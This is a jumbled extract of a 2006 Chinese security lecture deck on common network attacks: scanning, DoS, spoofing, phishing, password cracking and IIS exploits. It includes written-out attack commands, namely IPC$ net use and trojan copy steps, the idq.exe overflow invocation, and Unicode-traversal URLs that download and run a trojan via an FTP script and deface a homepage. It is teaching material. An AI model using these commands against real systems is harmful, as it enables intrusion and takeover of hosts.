网络常见攻击技术及防御措施
信息收集-探测扫描 – (1)
扫描是“一切入侵的基础”
– – – –
获取对方操作系统信息 获取对方主机开放服务信息 获知对方可能存在的漏洞 获取对方主机用户列表
常用扫描工具
– –
漏洞扫描工具 nessus、X-scanner、ISS、Retina 探测扫描工具 nmap、supperscan
网络安全技术讲座©2006
11
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-拒绝服务攻击
利用协议漏洞
利用网络漏洞进行攻击 利用系统漏洞进行攻击 利用服务漏洞进行攻击 大流量洪水攻击
网络安全技术讲座©2006
12
上海三零卫士信息安全有限公司 30wish Information Security
前提
–
例如:使用X-scanner扫描到某Win2K主机允许空连接,且共享 IPC$,管理员administrator口令为password
目的
–
在目标主机上运行木马程序以完全控制该主机
13
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
ID:scn
psw: 12 123456 12345 1234 123
No,you can not login in OK,you can login in
网络安全技术讲座©2006
10
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为– 口令破解工具
工具举例
目的:
获取个人帐户信息以得到经济利益。
网络安全技术讲座©2006
20
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
假冒网络银行、网站
伪造网站:
建立起域名和网页内容都与真正网上银行系统、网上证券交易平台 极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的 网上银行、网上证券系统或者伪 造银行储蓄卡、证券交易卡盗窃 资金。
攻击前奏- 踩点
踩点的目的
–
获取对方大概信息
主机信息 是否存在漏洞 密码脆弱性等等
–
指导下一步攻击行为
踩点的方式
– – –
专用漏洞扫描工具 正式渠道:媒体(如搜索引擎、广告介绍等) 社会工程学
2
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
WindowNT用户口令破解 – 典型工具:l0pht的nt口令破解工具
*号密码查看 – 简单编程实现 联众、QQ密码窃取 – 重画登陆窗口
网络安全技术讲座©2006
9
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-口令攻击示意
ID:scn psw:123456 Ok,you can login in
网络安全技术讲座©2006
16
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-缓存溢出攻击(.idq缓存溢出攻击)
漏洞描述
–
微软IIS默认安装情况下带了一个索引服务器(Index Server ,在Windows 2000下为"Index Service")。默认安装时,IIS 支持两种脚本映射:管理脚本(.ida文件)、Internet数据查 询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 idq.dll来处理和解释。
网络常见攻击技术及 防御措施
沈传宁
shencn@
上海三零卫士信息安全有限公司
计算机网络攻防技术 直奔主题
完整的攻击行为
– – – –
踩点(信息收集) 入侵 留后门 抹去痕迹
防范技术
–
针对以上提到的攻击行为提出防范措施
网络安全技术讲座©2006
1
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (3)
漏洞扫描利器
–
– nessus
扫描报告示例
网络安全技术讲座©2006
5
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (4)
极好的探测工具
- nmap
网络安全技术讲座©2006
6
上海三零卫士信息安全有限公司 30wish Information Security
入侵实例 – IPC$
攻击步骤
–
– – – –
建立连接
C:\>net use \\127.0.0.1\IPC$ "" /user:admintitrator
拷贝木马服务器端
C:\>copy srv.exe \\127.0.0.1\admin$
查看对方时间
C:\>net time \\127.0.0.1
入侵行为- 利用系统漏洞( IPC$)
IPC$是什么
–
ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理 而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻 辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一 定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导 出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得 更高的权限,从而达到不可告人的目的.
网络安全技术讲座©2006 17
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为 – .ida/.idq溢出攻击
攻击步骤
– –
傻瓜式的攻击,使用溢出利用程序idq.c 编译之后,在命令控制台中运行 运行步骤如下 C:\>idq.exe <溢出的主机> <主机补丁> 之后telnet 目的主机的溢出端口,便得到system权 限的控制台
–
其他类似的攻击还有IIS5Hack.exe等
–
其利用了IIS 5.0 .printer ISAPI扩展远程缓冲溢出漏 洞
18
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为-电子欺骗
IP欺骗
TCP劫持 ARP欺骗
DNS欺骗
3
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
信息收集 - 探测扫描 – (2)
国产优秀漏洞扫描器
–
– X-scanner
扫描报告示例
网络安全技术讲座©2006
4
上海三零卫士信息安全有限公司 30wish Information Security
idq.dll实现上存在一个缓冲区溢出漏洞,远程攻击者可以利用 此漏洞通过溢出攻击以“Local System”的权限在主机上执行 任意指令。 由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区 ,如果攻击者提供一个特殊格式的URL,就可能引发一个缓 冲区溢出。通过精心构造发送数据,攻击者可以改变程序执 行流程,以“Local System”的权限执行任意代码。
网络安全技术讲座©2006
15
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为- UNICODE攻击
攻击步骤
–
–
拷贝cmd.exe至scripts目录
写入ftp批处理文件
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\ winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>hacker.txt
– – – –
运行该批处理文件
http://x.x.x.x/scripts/ccc.exe?/c+ftp+-s:hacker.txt
执行下载的文件(木马服务器端)
http://x.x.x.x/scripts/ccc.exe?/c+srv.exe
木马客户端连接 或者修改其主页
http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by hahaha >c:\inetpub\wwwroot\index.html
源径路由欺骗
网络安全技术讲座©2006